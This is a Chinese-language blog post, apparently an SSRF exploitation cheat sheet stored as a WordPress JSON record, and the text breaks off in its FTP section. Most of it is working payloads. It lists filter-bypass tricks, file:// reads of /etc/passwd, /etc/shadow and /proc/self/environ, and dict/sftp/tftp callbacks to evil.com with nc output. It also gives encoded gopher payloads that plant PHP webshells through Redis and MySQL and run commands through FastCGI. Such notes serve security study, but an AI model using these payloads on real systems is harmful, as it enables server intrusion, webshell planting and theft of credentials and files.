{"id":71,"date":"2026-03-14T22:34:52","date_gmt":"2026-03-14T14:34:52","guid":{"rendered":"http:\/\/47.118.30.30\/?p=71"},"modified":"2026-03-15T11:40:26","modified_gmt":"2026-03-15T03:40:26","slug":"ssrf","status":"publish","type":"post","link":"https:\/\/arknight.wiki\/index.php\/2026\/03\/14\/ssrf\/","title":{"rendered":"ssrf"},"content":{"rendered":"<h1><strong>SSRF<\/strong><\/h1>\n<p>\u6982\u5ff5\uff1a\u653b\u51fb\u8005\u901a\u8fc7\u8be5\u6f0f\u6d1e\u53ef\u4ee5\u5229\u7528\u670d\u52a1\u5668\u7aef\u7684\u5e94\u7528\u7a0b\u5e8f\u53d1\u8d77\u4f2a\u9020\u7684\u8bf7\u6c42\uff0c\u4e00\u822c\u60c5\u51b5\u4e0b\uff0cSSRF\u653b\u51fb\u7684\u76ee\u6807\u662f\u4ece\u5916\u7f51\u65e0\u6cd5\u8bbf\u95ee\u7684\u5185\u90e8\u7cfb\u7edf\u3002\u56e0\u4e3a\u5b83\u662f\u7531\u670d\u52a1\u7aef\u53d1\u8d77\u7684\uff0c\u6240\u4ee5\u5b83\u80fd\u591f\u8bf7\u6c42\u5230\u4e0e\u5b83\u76f8\u8fde\u800c\u4e0e\u5916\u7f51\u9694\u79bb\u7684\u5185\u7f51\u3002\u4e5f\u5c31\u662f\u8bf4\u53ef\u4ee5\u5229\u7528\u4e00\u4e2a\u7f51\u7edc\u8bf7\u6c42\u7684\u670d\u52a1\uff0c\u5f53\u4f5c\u8df3\u677f\u8fdb\u884c\u653b\u51fb\u3002\u56e0\u6b64\u53ef\u4ee5\u7ed5\u8fc7\u4e00\u4e9b\u57fa\u4e8e\u7f51\u7edc\u62d3\u6251\u7684\u5b89\u5168\u9632\u62a4\u3002<\/p>\n<h3>\u6ce8\u5165\u70b9\uff1a<\/h3>\n<pre><code>\u4eceURL\u5173\u952e\u5b57\u4e2d\u5bfb\u627e\uff1ashare\u3001wap\u3001url\u3001link\u3001src\u3001source\u3001target\u3001u\u30013g\u3001display\u3001sourceURl\u3001imageURL\u3001domain\u3002 \n\n\u5165\u53e3\u51fd\u6570\uff1a\nfile_get_contents()\uff1a\u7528\u4e8e\u83b7\u53d6\u6307\u5b9a URL \u7684\u5185\u5bb9\uff0c\u7136\u540e\u6307\u5b9a\u4e00\u4e2a\u6587\u4ef6\u540d\u8fdb\u884c\u4fdd\u5b58\uff0c\u5e76\u5c55\u793a\u7ed9\u7528\u6237\u3002\u4f1a\u628a\u4e00\u4e2a\u5b57\u7b26\u4e32\u5199\u5165\u6587\u4ef6\u4e2d\u3002\u5982\u679c\u7528\u6237\u53ef\u4ee5\u63a7\u5236 URL \u53c2\u6570\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u6784\u9020\u6076\u610f URL\uff0c\u4f7f\u670d\u52a1\u5668\u8bbf\u95ee\u5185\u7f51\u670d\u52a1\u3001\u8bfb\u53d6\u672c\u5730\u6587\u4ef6\u6216\u653b\u51fb\u5176\u4ed6\u670d\u52a1\u5668\u3002\n\/\/http:\/\/example.com\/ssrf.php?url=file:\/\/\/etc\/passwd\n\/\/http:\/\/example.com\/ssrf.php?url=http:\/\/192.168.1.100:6379\n\nfsockopen()\uff1a\u7528\u4e8e\u6253\u5f00\u4e00\u4e2a\u7f51\u7edc\u8fde\u63a5\u6216 Unix \u5957\u63a5\u5b57\u8fde\u63a5\u3002\u5982\u679c\u7528\u6237\u53ef\u4ee5\u63a7\u5236\u4e3b\u673a\u540d\u548c\u7aef\u53e3\u53c2\u6570\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u8be5\u51fd\u6570\u8bbf\u95ee\u5185\u7f51\u670d\u52a1\u6216\u672c\u5730\u8d44\u6e90\u3002\n\/\/http:\/\/example.com\/ssrf.php?host=192.168.1.100&amp;port=22\n\ncurl_exec()\uff1a\u7528\u4e8e\u6267\u884c\u4e00\u4e2a cURL \u4f1a\u8bdd\u3002\u5982\u679c\u7528\u6237\u53ef\u4ee5\u63a7\u5236 URL \u53c2\u6570\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u8be5\u51fd\u6570\u8bbf\u95ee\u5185\u7f51\u670d\u52a1\u3001\u8bfb\u53d6\u672c\u5730\u6587\u4ef6\u6216\u653b\u51fb\u5176\u4ed6\u670d\u52a1\u5668\u3002\n\/\/http:\/\/example.com\/ssrf.php?url=http:\/\/192.168.1.100:6379\n\/\/http:\/\/example.com\/ssrf.php?url=gopher:\/\/127.0.0.1:6379\/_POST%20\/ssrf.php%20HTTP\/1.1%0d%0aHost:%20127.0.0.1%0d%0a<\/code><\/pre>\n<h3>\u5229\u7528\uff1a<\/h3>\n<p>\u5185\u7f51\u8bbf\u95ee\uff1a<\/p>\n<pre><code>?url=http:\/\/127.0.0.1\/flag.php<\/code><\/pre>\n<p>\u4f2a\u534f\u8bae\u8bfb\u53d6\u6587\u4ef6\uff1a<\/p>\n<pre><code>?url=file:\/\/\/var\/www\/html\/flag.php<\/code><\/pre>\n<p>\u7aef\u53e3\u626b\u63cf\uff1a<\/p>\n<pre><code>?url=dict:\/\/127.0.0.1:8000<\/code><\/pre>\n<p>\u53d1\u9001POST\u8bf7\u6c42\uff0c\u653b\u51fb\u5185\u7f51\u4e2d\u7684\u5e94\u7528\uff1a<\/p>\n<pre><code>?url=gopher:\/\/127.0.0.1:80\/_POST%20\/flag.php%20HTTP\/1.1%0D%0AHost:%20127.0.0.1%0D%0AContent-Type:%20application\/x-www-form-urlencoded%0D%0AContent-Length:%2036%0D%0A%0D%0Akey=a68a3b03e80ce7fef96007dfa01dc077<\/code><\/pre>\n<p>\u653b\u51fbFastCGI\u534f\u8bae\uff0c\u5b9e\u73b0\u4ee3\u7801\u6267\u884c\uff1a<\/p>\n<pre><code>?url=gopher:\/\/127.0.0.1:80\/_POST%20\/flag.php%20HTTP\/1.1%0D%0AHost:%20127.0.0.1%0D%0AContent-Type:%20application\/x-www-form-urlencoded%0D%0AContent-Length:%2036%0D%0A%0D%0Akey=a68a3b03e80ce7fef96007dfa01dc077<\/code><\/pre>\n<p>\u653b\u51fbRedis\u670d\u52a1\uff0c\u5b9e\u73b0\u4ee3\u7801\u6267\u884c\uff1a<\/p>\n<pre><code>\uff1furl=gopher:\/\/127.0.0.1:6379\/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2434%0D%0A%0A%0A%3C%3Fphp%20system%28%24_GET%5B%27cmd%27%5D%29%3B%20%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A\/var\/www\/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A%0A<\/code><\/pre>\n<h3><\/h3>\n<h3>\u7ed5\u8fc7\uff1a<\/h3>\n<p>ip\u683c\u5f0f\u8f6c\u6362\uff1a<\/p>\n<pre><code>127.0.0.1\n\u516b\u8fdb\u5236\uff1a0177.0.0.1\n\u5341\u516d\u8fdb\u5236\uff1a0x7f.0.0.1\n\u5341\u8fdb\u5236\uff1a2130706433<\/code><\/pre>\n<p>@\uff1a<\/p>\n<pre><code>http:\/\/8.8.8.8@127.0.0.1:8080 \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\/\/@\u524d\u4f5c\u4e3a\u7528\u6237\u4fe1\u606f\u88ab\u5ffd\u7565\nhttp:\/\/127.0.0.1#8.8.8.8 \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\/\/#\u540e\u4f5c\u4e3aurl\u7247\u6bb5\u4e0d\u53d1\u9001\u51fa\u53bb<\/code><\/pre>\n<p>\u5229\u7528[::]\uff1a<\/p>\n<pre><code>IPv6 \u5730\u5740 ::1 \u4e5f\u53ef\u4ee5\u8868\u793a localhost\nhttp:\/\/[::1]:80\/ \u6216 http:\/\/[::]:80\/ \u53ef\u4ee5\u88ab\u89e3\u6790\u4e3a localhost\uff0c\u4ece\u800c\u7ed5\u8fc7\u5bf9 127.0.0.1 \u7684\u8fc7\u6ee4\u3002<\/code><\/pre>\n<p>\u5229\u7528\u77ed\u7f51\u5740\uff1a<\/p>\n<p>\u77ed\u7f51\u5740\u670d\u52a1\u901a\u8fc7\u5c06\u957f\u7f51\u5740\u538b\u7f29\u6210\u77ed\u7f51\u5740\uff0c\u5b9e\u73b0\u5feb\u901f\u8bbf\u95ee\u3002\u5728SSRF\u6f0f\u6d1e\u5229\u7528\u4e2d\uff0c\u653b\u51fb\u8005\u53ef\u4ee5\u5229\u7528\u77ed\u7f51\u5740\u670d\u52a1\u7684\u7279\u6027\uff0c\u5c06\u76ee\u6807\u5730\u5740\uff08\u5982\u5185\u7f51\u670d\u52a1\u5730\u5740\uff09\u9690\u85cf\u5728\u77ed\u7f51\u5740\u540e\u9762\uff0c\u4ece\u800c\u7ed5\u8fc7\u76ee\u6807\u670d\u52a1\u5668\u5bf9\u7279\u5b9aURL\u7684\u8fc7\u6ee4\u3002<\/p>\n<p>\u5229\u7528\u7279\u6b8a\u57df\u540d\uff1a<\/p>\n<p>\u539f\u7406\u662fDNS\u89e3\u6790\u3002xip.io\u53ef\u4ee5\u6307\u5411\u4efb\u610f\u57df\u540d<\/p>\n<pre><code>127.0.0.1.xip.io\uff0c\u53ef\u89e3\u6790\u4e3a127.0.0.1<\/code><\/pre>\n<p>\u5229\u7528\u53e5\u53f7\uff1a<\/p>\n<pre><code>127\u30020\u30020\u30021 &gt;&gt;&gt; 127.0.0.1<\/code><\/pre>\n<p>302\u8df3\u8f6c\uff1a<\/p>\n<p>\u53ef\u4ee5\u5229\u7528302\u8df3\u8f6c\uff0c\u5c06\u76ee\u6807\u670d\u52a1\u5668\u7684\u8bf7\u6c42\u91cd\u5b9a\u5411\u5230\u5185\u7f51\u5730\u5740\u6216\u5176\u4ed6\u53d7\u9650\u5730\u5740\uff0c\u4ece\u800c\u7ed5\u8fc7\u5bf9\u7279\u5b9aURL\u7684\u8fc7\u6ee4\u3002<\/p>\n<p>DNS\u91cd\u7ed1\u5b9a\uff1a<\/p>\n<p>\u7565<\/p>\n<p>\u5229\u7528\u5c01\u95ed\u5b57\u6bcd\u6570\u5b57\uff1a<\/p>\n<p>\u5c01\u95ed\u5b57\u6bcd\u6570\u5b57\uff08Enclosed Alphanumerics\uff09\u662f\u4e00\u7ec4\u7279\u6b8a\u7684 Unicode \u5b57\u7b26\uff0c\u8fd9\u4e9b\u5b57\u7b26\u5728\u67d0\u4e9b\u60c5\u51b5\u4e0b\u53ef\u4ee5\u88ab\u6d4f\u89c8\u5668\u6216\u89e3\u6790\u5668\u8bc6\u522b\u4e3a\u666e\u901a\u7684\u5b57\u6bcd\u6570\u5b57\u5b57\u7b26\u3002\u5229\u7528\u8fd9\u4e9b\u5b57\u7b26\u53ef\u4ee5\u7ed5\u8fc7\u5bf9\u7279\u5b9a\u57df\u540d\u6216IP\u5730\u5740\u7684\u8fc7\u6ee4\u3002<\/p>\n<pre><code>\u24d4\u24e7\u24d0\u24dc\u24df\u24db\u24d4.\u24d2\u24de\u24dc &gt;&gt;&gt; example.com\nhttp:\/\/127.0.0.1&gt;&gt;&gt;http:\/\/\u2460\u2461\u2466\uff61\u24ea\u3002\u24ea\u3002\u2460\nList: \u2460 \u2461 \u2462 \u2463 \u2464 \u2465 \u2466 \u2467 \u2468 \u2469 \u246a \u246b \u246c \u246d \u246e \u246f \u2470 \u2471 \u2472 \u2473 \u2474 \u2475 \u2476 \u2477 \u2478 \u2479 \u247a \u247b \u247c \u247d \u247e \u247f \u2480 \u2481 \u2482 \u2483 \u2484 \u2485 \u2486 \u2487 \u2488 \u2489 \u248a \u248b \u248c \u248d \u248e \u248f \u2490 \u2491 \u2492 \u2493 \u2494 \u2495 \u2496 \u2497 \u2498 \u2499 \u249a \u249b \u249c \u249d \u249e \u249f \u24a0 \u24a1 \u24a2 \u24a3 \u24a4 \u24a5 \u24a6 \u24a7 \u24a8 \u24a9 \u24aa \u24ab \u24ac \u24ad \u24ae \u24af \u24b0 \u24b1 \u24b2 \u24b3 \u24b4 \u24b5 \u24b6 \u24b7 \u24b8 \u24b9 \u24ba \u24bb \u24bc \u24bd \u24be \u24bf \u24c0 \u24c1 \u24c2 \u24c3 \u24c4 \u24c5 \u24c6 \u24c7 \u24c8 \u24c9 \u24ca \u24cb \u24cc \u24cd \u24ce \u24cf \u24d0 \u24d1 \u24d2 \u24d3 \u24d4 \u24d5 \u24d6 \u24d7 \u24d8 \u24d9 \u24da \u24db \u24dc \u24dd \u24de \u24df \u24e0 \u24e1 \u24e2 \u24e3 \u24e4 \u24e5 \u24e6 \u24e7 \u24e8 \u24e9 \u24ea \u24eb \u24ec \u24ed \u24ee \u24ef \u24f0 \u24f1 \u24f2 \u24f3 \u24f4 \u24f5 \u24f6 \u24f7 \u24f8 \u24f9 \u24fa \u24fb \u24fc \u24fd \u24fe \u24ff<\/code><\/pre>\n<h3>\u4f2a\u534f\u8baeplus\uff1a<\/h3>\n<pre><code>file:\/\/\/ \u4ece\u6587\u4ef6\u7cfb\u7edf\u4e2d\u83b7\u53d6\u6587\u4ef6\u5185\u5bb9\uff0c\u5982\uff0cfile:\/\/\/etc\/passwd\ndict:\/\/ \u5b57\u5178\u670d\u52a1\u5668\u534f\u8bae\uff0c\u8bbf\u95ee\u5b57\u5178\u8d44\u6e90\uff0c\u5982\uff0cdict:\/\/\/ip:6739\/info\uff1a\nsftp:\/\/ SSH\u6587\u4ef6\u4f20\u8f93\u534f\u8bae\u6216\u5b89\u5168\u6587\u4ef6\u4f20\u8f93\u534f\u8bae\nldap:\/\/ \u8f7b\u91cf\u7ea7\u76ee\u5f55\u8bbf\u95ee\u534f\u8bae\ntftp:\/\/ \u7b80\u5355\u6587\u4ef6\u4f20\u8f93\u534f\u8bae\ngopher:\/\/ \u5206\u5e03\u5f0f\u6587\u6863\u4f20\u9012\u670d\u52a1\uff0c\u53ef\u4f7f\u7528gopherus\u751f\u6210payload<\/code><\/pre>\n<p>file:<\/p>\n<pre><code>http:\/\/example.com\/ssrf.php?url=file:\/\/\/etc\/passwdhttp:\/\/example.com\/ssrf.php?url=file:\/\/\/C:\/Windows\/win.ini\n\n\u8def\u5f84\u904d\u5386\uff1a\u7ed3\u5408\u8def\u5f84\u904d\u5386\u6280\u672f\u8bbf\u95ee\u4efb\u610f\u6587\u4ef6\nhttp:\/\/target.com\/fetch?url=file:\/\/\/var\/www\/html\/..\/..\/..\/etc\/shadow\n\n\u7279\u6b8a\u6587\u4ef6\u8bbf\u95ee\uff1a\u8bbf\u95ee\u7279\u6b8a\u6587\u4ef6\u83b7\u53d6\u7cfb\u7edf\u4fe1\u606f\nhttp:\/\/target.com\/fetch?url=file:\/\/\/proc\/self\/environ\nhttp:\/\/target.com\/fetch?url=file:\/\/\/proc\/self\/cmdline\n\n\u76ee\u5f55\u5217\u8868\uff1a\u67d0\u4e9b\u5b9e\u73b0\u53ef\u80fd\u5141\u8bb8\u5217\u51fa\u76ee\u5f55\u5185\u5bb9\nhttp:\/\/target.com\/fetch?url=file:\/\/\/var\/www\/html\/<\/code><\/pre>\n<p>dict:<\/p>\n<p>\u8fd9\u79cdURL Scheme\u80fd\u591f\u5f15\u7528\u5141\u8bb8\u901a\u8fc7DICT\u534f\u8bae\u4f7f\u7528\u7684\u5b9a\u4e49\u6216\u5355\u8bcd\u5217\u8868\uff1a<\/p>\n<pre><code>dict:\/\/ \u534f\u8bae\u662f\u4e00\u79cd\u57fa\u4e8e TCP \u7684\u5b57\u5178\u67e5\u8be2\u534f\u8bae\uff0c\u5b9a\u4e49\u4e8e RFC 2229\uff081997 \u5e74\uff09\uff0c\u7528\u4e8e\u5ba2\u6237\u7aef\u5411\u5b57\u5178\u670d\u52a1\u5668\u67e5\u8be2\u5355\u8bcd\u5b9a\u4e49\u3001\u540c\u4e49\u8bcd\u3001\u8bcd\u6027\u7b49\u8bed\u8a00\u5b66\u4fe1\u606f\n\u683c\u5f0f\uff1adict:\/\/&lt;host&gt;[:&lt;port&gt;]\/[&lt;database&gt;:]&lt;word&gt;\n\ndict:\/\/127.0.0.1:22\/\uff1a\u82e5\u8fd4\u56de SSH banner\uff08\u5982 SSH-2.0-OpenSSH\uff09\uff0c\u8bf4\u660e SSH \u5f00\u653e\n\ndict:\/\/127.0.0.1:25\/\uff1a\u8fd4\u56de 220 mail.example.com \u2192 \u5b58\u5728\u90ae\u4ef6\u670d\u52a1\n\ndict:\/\/127.0.0.1:6379\/\uff1a\u8fd4\u56de -ERR unknown command 'CLIENT' \u2192 \u786e\u8ba4\u662f Redis\n\ndict:\/\/127.0.0.1:3306\/\uff1a\u8fd4\u56de MySQL \u534f\u8bae\u5305\uff08\u4e71\u7801\uff09\u2192 MySQL \u5f00\u653e\n\ndict:\/\/192.168.1.100:8080\/\uff1a\u82e5\u8fd4\u56de HTTP \u54cd\u5e94 \u2192 \u5b58\u5728\u5185\u7f51\u7ba1\u7406\u540e\u53f0\n\nhttp:\/\/example.com\/ssrf.php?dict:\/\/evil.com:1337\/\uff1a\u8ba9\u670d\u52a1\u5668\u5411\u653b\u51fb\u673a\u5bf9\u5e94\u7aef\u53e3\u53d1\u8d77\u8fde\u63a5\nnc\u663e\u793a\uff1a\n$ nc -lvp 1337\nConnection from [192.168.0.12] port 1337[tcp\/*]\naccepted (family 2, sport 31126)CLIENT libcurl 7.40.0\n\nRedis\u547d\u4ee4\u6267\u884c\uff1a\u5229\u7528dict\u534f\u8bae\u4e0eRedis\u670d\u52a1\u4ea4\u4e92\nhttp:\/\/target.com\/fetch?url=dict:\/\/192.168.1.10:6379\/info\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\/\/infp\u83b7\u53d6\u670d\u52a1\u5668\u4fe1\u606f\nhttp:\/\/target.com\/fetch?url=dict:\/\/192.168.1.10:6379\/CONFIG SET dir \/var\/www\/html\/\nhttp:\/\/target.com\/fetch?url=dict:\/\/192.168.1.10:6379\/SET webshell \"&lt;?php @eval($_POST['cmd']); ?&gt;\"\n\nMemcached\u6570\u636e\u63d0\u53d6\uff1a\u8bbf\u95eeMemcached\u670d\u52a1\u83b7\u53d6\u7f13\u5b58\u6570\u636e\nhttp:\/\/target.com\/fetch?url=dict:\/\/192.168.1.10:11211\/stats<\/code><\/pre>\n<p>sftp:<\/p>\n<pre><code>SSH\u6587\u4ef6\u4f20\u8f93\u534f\u8bae\uff08SSH File Transfer Protocol\uff09\uff0c\u6216\u5b89\u5168\u6587\u4ef6\u4f20\u8f93\u534f\u8bae\uff08Secure File Transfer Protocol\uff09\uff0c\u8fd9\u662f\u4e00\u79cd\u4e0eSSH\u6253\u5305\u5728\u4e00\u8d77\u7684\u5355\u72ec\u534f\u8bae\uff0c\u5b83\u8fd0\u884c\u5728\u5b89\u5168\u8fde\u63a5\u4e0a\uff0c\u5e76\u4ee5\u7c7b\u4f3c\u7684\u65b9\u5f0f\u8fdb\u884c\u5de5\u4f5c\u3002\n\n\u683c\u5f0f\uff1asftp:\/\/[user[:pass]@]host[:port]\/path\n\u4f8b\uff1asftp:\/\/admin:123456@192.168.1.100:22\/etc\/passwd\n\nsftp:\/\/127.0.0.1:22\/\uff1a\u82e5\u8fd4\u56de SSH banner\uff08\u5982 SSH-2.0-OpenSSH\uff09\u2192 \u8bf4\u660e SSH \u5f00\u653e\n\nhttp:\/\/example.com\/ssrf.php?url=sftp:\/\/evil.com:1337\/\nevil.com:$ nc -lvp 1337\nConnection from [192.168.0.12] port 1337[tcp\/*]\naccepted (family 2, sport 37146)SSH-2.0-libssh2_1.4.2<\/code><\/pre>\n<p>ldap:\/\/\u6216ldaps:\/\/ \u6216ldapi:\/\/\uff1a<\/p>\n<pre><code>LDAP\u4ee3\u8868\u8f7b\u91cf\u7ea7\u76ee\u5f55\u8bbf\u95ee\u534f\u8bae\uff0c\u5e38\u7528\u4e8e\u8eab\u4efd\u8ba4\u8bc1\u3002\u5b83\u662fIP\u7f51\u7edc\u4e0a\u7684\u4e00\u79cd\u7528\u4e8e\u7ba1\u7406\u548c\u8bbf\u95ee\u5206\u5e03\u5f0f\u76ee\u5f55\u4fe1\u606f\u670d\u52a1\u7684\u5e94\u7528\u7a0b\u5e8f\u534f\u8bae\u3002\n\nldap:\/\/\uff1a\u7aef\u53e3389\nldaps:\/\/\uff1a\u7aef\u53e3636\n\nhttp:\/\/example.com\/ssrf.php?url=ldap:\/\/192.168.1.10:389\/\uff1a\u786e\u8ba4\u5185\u7f51\u662f\u5426\u5b58\u5728 Active Directory\n\nldap:\/\/dc.internal:389\/cn=admin,dc=example,dc=com?cn\uff1a\u5c1d\u8bd5\u8bfb\u53d6 LDAP \u6761\u76ee\n\nhttp:\/\/example.com\/ssrf.php?url=ldap:\/\/localhost:1337\/%0astats%0aquit\nhttp:\/\/example.com\/ssrf.php?url=ldaps:\/\/localhost:1337\/%0astats%0aquit\nhttp:\/\/example.com\/ssrf.php?url=ldapi:\/\/localhost:1337\/%0astats%0aquit\n\/\/\u786e\u8ba4 1337 \u7aef\u53e3\u5f00\u653e,\u540e\u7eed\u518d\u7528 gopher:\/\/ \u53d1\u9001\u771f\u6b63\u7684 Memcached \u547d\u4ee4\n\nLDAP\u6ce8\u5165\uff1a\u7ed3\u5408LDAP\u6ce8\u5165\u6280\u672f\u83b7\u53d6\u76ee\u5f55\u4fe1\u606f\nhttp:\/\/target.com\/fetch?url=ldap:\/\/192.168.1.10:389\/dc=example,dc=com??sub?(uid=*)\n\nLDAP\u7ed1\u5b9a\u64cd\u4f5c\uff1a\u5c1d\u8bd5\u4f7f\u7528\u4e0d\u540c\u51ed\u8bc1\u8fdb\u884cLDAP\u7ed1\u5b9a<\/code><\/pre>\n<p>tftp:\/\/:<\/p>\n<pre><code>tftp:\/\/:\u7528\u4e8e\u5185\u7f51\u6587\u4ef6\u8bfb\u53d6\uff08\u6709\u9650\uff09\u548c\u670d\u52a1\u63a2\u6d4b\uff0c\u4f46\u5176\u80fd\u529b\u53d7\u9650\u4e8eTFTP\u534f\u8bae\u672c\u8eab\u7684\u7b80\u5355\u6027\u548c\u65e0\u8ba4\u8bc1\u673a\u5236\u3002\n\nhttp:\/\/example.com\/ssrf.php?url=tftp:\/\/192.168.1.100\/running-config:\u82e5\u6587\u4ef6\u5b58\u5728\u4e14\u53ef\u8bfb \u2192 \u5185\u5bb9\u56de\u663e\u5230\u9875\u9762\n\nhttp:\/\/example.com\/ssrf.php?url=tftp:\/\/evil.com:1337\/TESTUDPPACKET:\u8ba9\u670d\u52a1\u5668\u5411evil.com:1337\u53d1\u8d77\u8fde\u63a5\n<\/code><\/pre>\n<p>gopher:\/\/\uff1a<\/p>\n<pre><code>gopher:\/\/\uff1a\u4e00\u79cd\u5206\u5e03\u5f0f\u6587\u6863\u4f20\u9012\u670d\u52a1\u3002\u5229\u7528\u8be5\u670d\u52a1\uff0c\u7528\u6237\u53ef\u4ee5\u65e0\u7f1d\u5730\u6d4f\u89c8\u3001\u641c\u7d22\u548c\u68c0\u7d22\u9a7b\u7559\u5728\u4e0d\u540c\u4f4d\u7f6e\u7684\u4fe1\u606f\u3002\u80fd\u6784\u9020\u4efb\u610f TCP payload\n\n\u683c\u5f0f\uff1agopher:\/\/&lt;host&gt;:&lt;port&gt;\/_&lt;URL_ENCODED_RAW_TCP_PAYLOAD&gt;\n\/\/_ \u662f gopher \u7684\u201c\u8bf7\u6c42\u7c7b\u578b\u201d\u6807\u8bc6\u7b26\uff08type=1 \u8868\u793a\u8fd4\u56de\u6587\u672c\uff09\n\/\/&lt;payload&gt; \u662f URL \u7f16\u7801\u540e\u7684\u539f\u59cb TCP \u6570\u636e\u6d41\n\/\/\u6362\u884c\u7b26\u5fc5\u987b\u7f16\u7801\u4e3a %0D%0A\uff08rn\uff09\n\ngopher:\/\/127.0.0.1:6379\/_SET%20webshell%20%22%5Cn%3C%3Fphp%20system%28%24_REQUEST%5B%27cmd%27%5D%29%3B%3F%3E%22%0D%0ACONFIG%20SET%20dir%20%2Fvar%2Fwww%2Fhtml%0D%0ACONFIG%20SET%20dbfilename%20shell.php%0D%0ASAVE%0D%0A\n\/\/\u53d1\u9001 Redis \u534f\u8bae\u547d\u4ee4\uff1a\n\/\/SET webshell \"n&lt;?php system($_REQUEST['cmd']);?&gt;\"\n\/\/CONFIG SET dir \/var\/www\/html\n\/\/CONFIG SET dbfilename shell.php\n\/\/SAVE\n\u6216\nhttp:\/\/target.com\/fetch?url=gopher:\/\/192.168.1.10:6379\/_%2A1%0D%0A%248%0D%0Aflushall%0D%0A%2A3%0D%0A%243%0D%0Aset%0D%0A%241%0D%0A1%0D%0A%2434%0D%0A%0A%0A%3C%3Fphp%20system%28%24_GET%5B%27cmd%27%5D%29%3B%20%3F%3E%0A%0A%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%243%0D%0Adir%0D%0A%2413%0D%0A\/var\/www\/html%0D%0A%2A4%0D%0A%246%0D%0Aconfig%0D%0A%243%0D%0Aset%0D%0A%2410%0D%0Adbfilename%0D%0A%249%0D%0Ashell.php%0D%0A%2A1%0D%0A%244%0D%0Asave%0D%0A\n\/\/\u5199\u5165Webshell\u5230\u7f51\u7ad9\u76ee\u5f55\n\ngopher:\/\/127.0.0.1:9000\/_%01%01%00%01%00%08%00%00%00%01%00%00%00%00%00%00%01%04%00%01%01%05%05%00%0F%10SERVER_SOFTWAREgo%20\/%20fcgiclient%20%0B%09REMOTE_ADDR127.0.0.1%0F%08SERVER_PROTOCOLHTTP\/1.1%0E%03CONTENT_LENGTH999%0E%04REQUEST_METHODPOST%09%4BPHP_VALUEauto_prepend_file%3Dphp%3A\/\/input%0F%17SCRIPT_FILENAME\/var\/www\/html\/index.php%0D%01DOCUMENT_ROOT\/%00%00%00%00%00%01%04%00%01%00%00%00%00%01%05%00%01%03%EB%04%00%3C%3Fphp%20system%28%22id%22%29%3Bdie%28%22-----Made-by-SpyD3r-----%5Cn%22%29%3B%3F%3E%00%00%00%00\n\/\/\u901a\u8fc7 PHP_VALUE \u8986\u76d6\u914d\u7f6e\uff0c\u6267\u884c php:\/\/input\n\/\/\u53ef\u66ff\u6362 system(\"id\") \u4e3a\u4efb\u610f\u547d\u4ee4\n\ngopher:\/\/127.0.0.1:3306\/_%00%00%00%01%85%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%6d%79%73%71%6c%00%14%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%6d%79%73%71%6c%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%6d%79%73%71%6c%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%6d%79%73%71%6c%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%6d%79%73%71%6c%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%6d%79%73%71%6c%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%6d%79%73%71%6c%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%0......\uff08\u6b64\u5904\u7701\u7565\u5927\u91cf\u8ba4\u8bc1\u5305\uff09......%00%00%00%03%73%65%6c%65%63%74%20%27%3C%3F%70%68%70%20%73%79%73%74%65%6d%28%24%5f%52%45%51%55%45%53%54%5b%22%63%6d%64%22%5d%29%3b%3f%3e%27%20%69%6e%74%6f%20%6f%75%74%66%69%6c%65%20%27%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%2f%6d%79%73%71%6c%2e%70%68%70%27%3b%00%00%00%00\n\/\/\u5199\u5165 Webshell \u5230 \/var\/www\/html\/mysql.php\n\/\/\u9700MySQL root \u6743\u9650 + secure_file_priv \u4e3a\u7a7a\n\ngopher:\/\/127.0.0.1:5000\/_GET%20\/%20HTTP\/1.1%0D%0AHost%3A%20127.0.0.1%3A5000%0D%0AUser-Agent%3A%20ssrf-test%0D%0AAccept%3A%20*\/*%0D%0A%0D%0A\n\/\/GET \/ HTTP\/1.1\n\/\/Host: 127.0.0.1:5000\n\/\/User-Agent: ssrf-test\n\/\/Accept: *\/*\n\nSMTP\u90ae\u4ef6\u53d1\u9001\uff1a\u901a\u8fc7SMTP\u670d\u52a1\u53d1\u9001\u90ae\u4ef6\nhttp:\/\/target.com\/fetch?url=gopher:\/\/192.168.1.10:25\/xHELO%20localhost%0D%0AMAIL%20FROM%3A%3Cattacker%40example.com%3E%0D%0ARCPT%20TO%3A%3Cvictim%40example.com%3E%0D%0ADATA%0D%0ASubject%3A%20Test%0D%0AThis%20is%20a%20test%0D%0A.%0D%0AQUIT\n<\/code><\/pre>\n<p>ftp\uff1a<\/p>\n<pre><code>\u7528\u4e8e\u4e0eFTP\u670d\u52a1\u5668\u4ea4\u4e92\uff1a\nhttp:\/\/target.com\/fetch?url=ftp:\/\/user:pass@192.168.1.10\/\n\nFTP\u4e3b\u52a8\u6a21\u5f0f\u5229\u7528\uff1a\u5728\u67d0\u4e9b\u60c5\u51b5\u4e0b\uff0c\u53ef\u4ee5\u5229\u7528FTP\u4e3b\u52a8\u6a21\u5f0f\u8fdb\u884c\u7aef\u53e3\u626b\u63cf\n\nFTP\u547d\u4ee4\u6ce8\u5165\uff1a\u5728\u67d0\u4e9b\u5b9e\u73b0\u4